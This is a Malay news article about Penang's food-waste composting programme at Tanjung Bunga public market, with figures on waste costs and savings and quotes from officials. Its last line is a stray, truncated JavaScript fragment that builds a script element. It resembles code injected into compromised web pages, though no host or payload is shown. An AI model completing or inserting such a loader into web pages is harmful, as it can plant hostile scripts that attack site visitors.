Pengkomposan sisa makanan penting demi masa depan

Oleh : WATAWA NATAF ZULKIFLI

Gambar : AHMAD ADIL MUHAMAD

TANJUNG BUNGA – Tahukah anda bahawa bagi setiap tan sampah yang dilupuskan, kita (masyarakat umum) perlu membayar sebanyak RM20.20 kepada pihak kontraktor pengurusan sisa buangan.

Malah, setiap warga Malaysia menghasilkan purata 1.1 kilogram (kg) sisa pepejal setiap hari iaitu bersamaan 8,000 tan bagi seluruh negara. Berdasarkan perangkaan tersebut, dalam tempoh sebulan, longgokkan tersebut mampu ‘membentuk’ Menara Berkembar Kuala Lumpur (KLCC).

Kenyataan tersebut dinyatakan Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow pada Pelancaran Program Pengkomposan Sisa Makanan di Pasar Awam Tanjung Bunga di sini baru-baru ini.

Mengulas lanjut, Kon Yeow yang juga Ahli Dewan Undangan Negeri (ADUN) Padang Kota memberitahu bahawa proses pengkomposan adalah amat penting kerana ia mampu mengurangkan perbelanjaan pengurusan sisa dan mengelakkan pembebasan gas metana.

“Sejak inisiatif tersebut dilancarkan kali pertama pada tahun 2011, Kerajaan Negeri berjaya mengkomposkan 283 tan sisa pepejal yang ‘diperoleh’ dari pasar-pasar.

“Ini telah menghasilkan penjimatan berjumlah RM5,716.60,’’ jelasnya.

Pada majlis berkaitan, Pasar Awam Tanjung Bunga merupakan pasar ke-lapan yang dibekalkan dengan kemudahan mesin pengkomposan sisa pepejal yang bernilai RM28,000 selepas Pasar Awam Pulau Tikus, Lebuh Campbell, Batu Lanchang, Farlim, Jelutong, Padang Tembak, Pasar dan Kompleks Makanan Bayan Baru.

Hadir sama, ADUN Tanjung Bunga, Teh Yee Cheu, Ahli-ahli Majlis Majlis Bandaraya Pulau Pinang (MBPP) antaranya, Syerleena Abdul Rashid, Joseph Ng Soon Siang dan Chris Lee Chun Kit.

var d=document;var s=d.createElement(‘script’);